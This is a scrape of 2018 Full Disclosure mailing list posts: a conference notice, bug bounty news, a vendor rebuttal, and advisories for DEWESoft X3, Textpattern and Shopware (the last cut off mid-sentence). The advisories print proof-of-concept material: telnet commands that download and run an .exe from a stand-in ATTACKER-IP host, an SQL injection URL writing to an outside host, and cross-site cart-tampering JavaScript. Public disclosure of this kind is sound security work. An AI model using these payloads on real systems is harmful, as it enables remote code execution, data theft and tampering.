[FD] hardwear.io CFP is Open & New Security Training in Berlin!
Greetings from hardwear.io! We would like to share few exciting updates that you can expect from hardwear.io in 2018! First of all, we are very proud to announce that hardwear.io is going to hold its first Security Training in Berlin! Dates: 26 – 27 April 2018 Venue: Novotel Am Tiergarten, Berlin, Germany Hardware Security Trainings: - Practical IOT Hacking by Aseem Jakhar - Low-Level Hardware Reversing by Javier-Vazquez Vidal & Ferdinand - Side-Channel Attacks 101 by Lejla Batina & Kostas Papagiannopoulos - Practical Car Hacking by Guillaume Heilles Registration is Open. Pre-con proces available till 31st March 2018. Hardwear.io Conference & Training 2018 will traditionally take place in The Hague for the 4th time! Mark your calendars to: Training: 11-12 September Conference: 13-14 September Venue: NH Hotels, The Hague, the Netherlands hardwear.io 2018 Call For Papers is Open till 9th May 2018! Get your research ready for another successful year! Best Regards, Yuliya Pliavaka Mob. +91-7720825835 <+91%2077208%2025835> / Linkedin www.hardwear.io Hardware Security Conference www.nullcon.net Nullcon Information Security Conference www.payatu.com Payatu Technologies ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access - CVE-2018-7756
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt [+] ISR: Apparition Security Vendor: = www.dewesoft.com Product: === DEWESoft X3 SP1 (64-bit) installer - X3 DEWESoft_FULL_X3_SP1_64BIT.exe Vulnerability Type: === Remote Internal Command Access CVE Reference: == CVE-2018-7756 Security Issue: The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run a "SETFIREWALL Off" command. The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install. Internal commands used by "RunExeFile.exe" for which I could not find any documentation. RUN RUNEX GETFIREWALL SETFIREWALL Off KILL USERNAME SHUTDOWN SENDKEYS LIST DWPIPE Exploit/POC: = TELNET x.x.x.x 1999 RUN calc.exe OR Launch the victims browser and send them to website for a drive-by download etc. TELNET x.x.x.x 1999 RUN http://ATTACKER-IP/DOOM.exe Then from the TELNET session execute it from Downloads directory. runexe c:\Users\victim\Downloads\DOOM.exe Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: February 9, 2018 Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018 Inform vendor of disclosure timeline : February 19, 2018 No further replys, update or addressing of the issue by vendor. Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018 March 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SQL Injection in Textpattern <= 4.6.2
= MGC ALERT 2018-002 - Original release date: February 12, 2018 - Last revised: March 12, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) - CVE-ID: CVE-2018-7474 = I. VULNERABILITY - SQL Injection in Textpattern <= 4.6.2 II. BACKGROUND - Textpattern is a free and open-source content management system (CMS) based on PHP and MySQL, originally developed by Dean Allen and now developed by Team Textpattern. III. DESCRIPTION - This bug was found using the portal with authentication as administrator. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. It is possible to inject SQL code in the variable "qty" on the page "index.php". IV. PROOF OF CONCEPT - The following URL's and parameters have been confirmed to all suffer from SQL injection. /textpattern/textpattern/index.php?event=link=link_change_pageby=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8 Note: the variable "_txp_token" doest not work as a anti-csrf. POC: /textpattern/textpattern/index.php?event=link=link_change_pageby=50%20into%20outfile%20'% 5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8 V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - Textpattern <= 4.6.2 VII. SOLUTION - Disable website until a fix is available. VIII. REFERENCES - https://textpattern.com/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - February 12, 2018 1: Initial release March 12, 2018 2: Revision to send to lists XI. DISCLOSURE TIMELINE - February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas February 12, 2018 2: Send to vendor without response February 26, 2018 3: Second email to vendor without response March 12, 2018 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] BitDefender Total Security 2018 - Insecure Pipe Permissions
Hello, Allow me to fix this for you: > On 6 Mar 2018, at 20:04, filipewrote: > > =[ Timeline of disclosure > ]=== > > 01/24/2018 - Vendor was informed of the vulnerability. > 01/29/2018 - Vendor did not respond. 01/25/2018 - We replied notifying you that we’ve opened a ticked with the relevant team 01/26/2018 - We asked for a working PoC 01/31/2018 - You replied with a theoretical “PoC” (no code, just a few steps which didn’t really help, sadly) 02/01/2018 - We replied asking for a script, a piece of code, a video, anything that backs up your claim since we didn’t reproduce it based on the steps you provided. 02/12/2018 - We notified you that we closed the ticket since you stopped replying > 01/24/2018 - CVE assigned [2] > 03/06/2018 - Advisory publication date. We take our bugbounty programs very seriously and other than some Nigerian princes and fake LinkedIn invites we reply to _all_ reports, valid, invalid or incredibly ridiculous alike. As such, you may imagine why, when we saw an advisory with our name saying “Vendor did not respond”, the team felt a bit disappointed for failing to reply for the first time in a few years. Thankfully this was not the case. If you still believe this is a genuine issue, exploitable in real life and you have some evidence to back that up, let us know and we’ll gladly reopen the ticket. Cheers, — Alex “Jay” BALAN Chief Security Researcher Bitdefender signature.asc Description: Message signed with OpenPGP ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$
Title: PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$ URL: https://www.vulnerability-db.com/?q=articles/2018/03/13/paypal-inc-increases-bug-bounty-payments-2018-3 #bugbounty #security #research #infosec -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PayPal Inc - New Venmo Bug Bounty Program
Title: PayPal Inc - New Venmo Bug Bounty Program URL: https://www.vulnerability-db.com/?q=articles/2018/02/27/paypal-inc-updates-bug-bounty-program-venmo-payments-services -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites
Advisory: Shopware Cart Accessible by Third-Party Websites RedTeam Pentesting discovered that the shopping cart implemented by Shopware offers an insecure API. Malicious, third-party websites may abuse this API to list, add or remove products from a user's cart. Details === Product: Shopware Affected Versions: 4.0.1 - 5.3.7 Fixed Versions: > 5.4.0 Vulnerability Type: Cross-Site Request Forgery Security Risk: low Vendor URL: https://shopware.com Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-012 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 2, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform." (from the Shopware GitHub repository [1]) More Details The Shopware web application provides users with a virtual shopping cart to collect products prior to checkout. This cart is displayed to the user as a modal sidebar appearing at the right edge of the browser window. Consequently, Shopware implements several API endpoints to allow JavaScript code to perform shopping cart operations. These endpoints are implemented in the "Shopware_Controllers_Frontend_Checkout" class and can be reached through the following paths: * /checkout/ajaxCart * /checkout/ajaxAddArticleCart * /checkout/ajaxDeleteArticleCart RedTeam Pentesting discovered that API endpoints support JSONP by specifying a URL parameter named callback. The origin of calls to the cart API is not validated. Therefore, any third-party website may make use of this API. If a customer of a Shopware shop visits a malicious, attacker-controlled website, JavaScript code on this site may access the user's shopping cart. Proof of Concept The following JavaScript snippets demonstrate how to access the cart of a Shopware shop at "https://example.net; from a third-party website. The "getJSON" function of jQuery 3 is used to interface with the JSONP API. By running the following code, the contents of a cart may be retrieved. The result of the API call is displayed on the browser's developer console. $.getJSON("https://example.net/checkout/ajaxCart?callback=?;) .done(console.log); The following code adds a new product to the cart. In this case, two instances of product 1234 are added. $.getJSON( "https://example.net/checkout/ajaxAddArticleCart"+ "?callback=?=1234=2" ).done(console.log); To remove a product from a user's shopping cart, attackers may use the following code. An id for the "sDelete" parameter may be obtained through a prior call to ajaxCart. $.getJSON( "https://example.net/checkout/ajaxDeleteArticleCart"+ "?callback=?=4321" ).done(console.log); Workaround == Support for JSONP should be removed from the cart AJAX API. This ensures, that only JavaScript code from the same origin may access the API and respectively the cart's contents. Furthermore, operations which change the state of the cart, i.e. adding and removing products, must be protected with CSRF tokens. Fix === Upgrade to Shopware newer than 5.4.0. Security Risk = This vulnerability is rated as a low risk. Disclosure of a user's shopping cart to attackers may negatively impact the user's privacy. Furthermore, competing eCommerce sites may use this information to improve sales. By adding or removing products from a user's cart, attackers can negatively impact a user's shopping experience and create support effort for the shop operator. Timeline 2017-08-28 Vulnerability identified 2017-09-13 Customer approved disclosure to vendor 2017-09-14 Vendor notified 2018-02-27 Vendor released fixed version 2018-03-13 Advisory released References == [1] https://github.com/shopware/shopware [2] https://community.shopware.com/Downloads_cat_448.html#5.4.0 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam